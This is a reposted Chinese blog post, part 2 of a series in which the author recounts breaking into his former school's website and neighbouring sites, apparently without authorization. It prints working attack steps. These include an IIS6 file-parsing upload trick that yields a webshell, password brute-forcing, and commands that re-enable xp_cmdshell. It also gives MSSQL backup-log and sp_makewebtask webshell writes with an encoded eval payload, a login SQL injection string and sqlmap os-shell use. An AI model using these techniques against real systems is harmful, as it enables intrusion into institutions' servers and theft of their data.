渗透测试

渗透测试之母校官网 part 2

字号+ 作者:Binghe 来源:转载 2016-11-25 10:06 我要评论( )

前奏在这里,传送门: 渗透纪实之母校官网 不谢。 #线索中断 等我放学回家的时候不好意思服务器掉了 后门掉了漏洞补了导致内网线索断了 没错 断了 就这样断了! #......

前奏在这里,传送门:渗透测试之母校官网 不谢。

#线索中断
等我放学回家的时候  不好意思  服务器掉了 后门掉了  漏洞补了  导致内网线索断了
没错 断了 就这样断了!



#无奈继续撸旁站内网

N久搞到个后台



第一次见 powereasy 这个版本 由于是iis6.0  随便找个上传不改名的的地方上传类似1.asp;1.jpg之类的文件就能解析
仔细研究了下  在 系统设置-模板标签管理-模板管理 底部上传一个1.asp;1.html的文件就ok
-




左边我圈的地方 模板名,我下载个程序研究了下路径,是这样:
根目录/Template/模板名/binghe.asp;binghe.html
这里就是
***.com/Template/海洋之星模板方案/1.asp;1.html

很容易的拿到了shell




很容易的提权



是个内网,转发,然后就没有然后了,给你两张图自己体会





#不能放弃,但何时是个头?


为什么还要拿旁站,因为上次拿下的太卡了 进不去服务器  无法内网渗透

目标:http://www.********.com
先来张图




但是不好意思  这是半年前的菜刀缓存,现在已经掉了,想拿回来进内网
人老了啊,就好忘事 忘了怎么拿的了 主页逛了半天  没发现注入啥的 这个小站你还指望什么xss打管理?几年登陆一次
找到个博客的二级目录

注册个用户进去  没有管理权限  于是乎收集原博客用户 着手爆破




我很心痛 这密码。。。



文件管理各种截断 各种潜规则测试无果 结论 :这个后台并无卵用(大牛可以试试)



接着发现几个都是二级目录 先看OA


小菜见识短浅 不曾见过这种  更别说漏洞什么的
学习了乌云大牛的逻辑漏洞,判断出这里确实可以用于爆破用户名,存在的用户名和不存在的用户名 脚本给的response不一样,经测试 admin一定是存在的
用burp枚举密码喽,因为这里没验证嘛,密码判断出是admin,登录试试


嗯? 随便一个密码试试,这样子


什么鬼?密码正确还不给进去  难道。。。可能限制了ip啥的 或者是什么新的技术  小菜惭愧
后来转来转去竟然有越权漏洞
这个



和这个


sa密码出来了  由于是内网 直连不行  试着在sql执行池里执行几个语句 哇擦 没有回显。


执行

[AppleScript] 纯文本查看 复制代码
?
exec master..xp_cmdshell 'ver'

显示错误


恢复一下xp_cmdshell

[AppleScript] 纯文本查看 复制代码
?
1
2
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

再执行
[AppleScript] 纯文本查看 复制代码
?
exec master..xp_cmdshell 'ver'

这次不显错了  说明语句已经运行  没有回显而已



在菜刀缓存里面得到网站绝对路径 尝试echo写shell

[AppleScript] 纯文本查看 复制代码
?
exec master..xp_cmdshell 'echo "123">e:\inetpub\wwwroot\oa\cs\1.asp'

访问无果 什么鬼? 难道管理员上次发现被黑  换了服务器?



来利用他这个执行错误就报错的特性判断目录存在

[AppleScript] 纯文本查看 复制代码
?
exec master.dbo.xp_subdirs 'e:\binghesec\';    //测试一个不存在的目录

果然报错
[AppleScript] 纯文本查看 复制代码
?
exec master.dbo.xp_subdirs 'e:\inetpub\wwwroot\oa\';   //测试原根目录

不报错。。
这我就不明白了 什么鬼??  !!!!

再试试备份法

[AppleScript] 纯文本查看 复制代码
?
alter database master set RECOVERY FULL--
create table cmd (a image)--
backup log master to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x3C256576616C20726571756573742822612229253E)--
backup log [northwind] to disk = 'e:\inetpub\wwwroot\oa\1.asp'--
drop table cmd--
0x3C256576616C20726571756573742822612229253E是hex的<%eval request(“a”)%>

再试试访问1.asp,同样是fuck the dog,404,sa 都搞不定 我也是醉了
以下是mssql存储过程写文件 都没成功

[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
5
6
exec master.dbo.xp_subdirs 'c:\www\';
exec sp_makewebtask 'c:\www\hack.asp','select''<%execute(request("SB"))%>'' '
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\testing.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,<<testing>>

看来我得放弃这里了
再回到OA,看了半天没什么进展,望着主页发呆,随手习惯性输入‘or’=’or’ , 点登陆竟然没反应 竟然不提示不存在该用户 很明显的注入啦 抓个包 丢sqlmap



sqlmap -r '/tmp/log.txt'




–is-dba返回yes  来–os-shell,结果令我失望


注意看我圈的地方  说明取得不到回显 这对我们获得信息很不利
大牛说在os-shell无回显的情况下,写一个cmd命令  下面这里选n,命令其实已经运行了


执行echo写个shell到根目录 试试访问 也不行
直接cmd不行 那咱来sql-shell自己执行试试 还是不行


百般无奈  退而求其次  跑数据  进后台。
竟然是这样,谁能告诉我为什么sa竟然跑不出数据??


尝试编码 —hex 和—no-cast 也是不行


说到这里  我已经什么都不想说了 给我根绳子吧  结实点的!



#结语
说了这么多就是没搞下!还得多学习!
未完待续,下篇终结 ,有些知识点还是可以看看的哦。

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Security/268.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 菜刀不能成功连接已上传木马

    菜刀不能成功连接已上传木马

    2017-12-14 10:51

  • 测试一次LOL领皮肤钓鱼网站的过程

    测试一次LOL领皮肤钓鱼网站的过程

    2017-05-05 14:24

  • 部署恶意CDN表单劫持渗透XX网络安全论坛

    部署恶意CDN表单劫持渗透XX网络安全论坛

    2016-12-15 09:54

  • 渗透测试之母校官网-part 1

    渗透测试之母校官网-part 1

    2016-11-25 10:00

网友点评
暂时未开启评论功能~